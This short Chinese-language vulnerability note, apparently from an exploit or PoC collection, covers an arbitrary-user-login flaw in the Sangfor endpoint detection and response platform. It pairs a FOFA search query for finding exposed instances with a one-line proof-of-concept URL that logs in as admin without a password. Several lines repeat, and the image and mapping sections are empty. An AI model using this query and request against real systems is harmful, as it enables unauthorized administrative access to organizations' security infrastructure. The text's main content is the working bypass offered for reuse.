S5-1深信服-终端检测响应平台-PermissionAC
漏洞描述:
深信服终端检测响应平台存在任意用户登录漏洞,攻击者通过漏洞可以登录网站后台。
网站图片:
网络测绘:
fofa语法:
title=“终端检测响应平台”
漏洞复现:
漏洞复现:
执行poc:
http://IP:xx/ui/login.php?user=admin
深信服终端检测响应平台存在任意用户登录漏洞,攻击者通过漏洞可以登录网站后台。
title=“终端检测响应平台”
漏洞复现:
执行poc:
http://IP:xx/ui/login.php?user=admin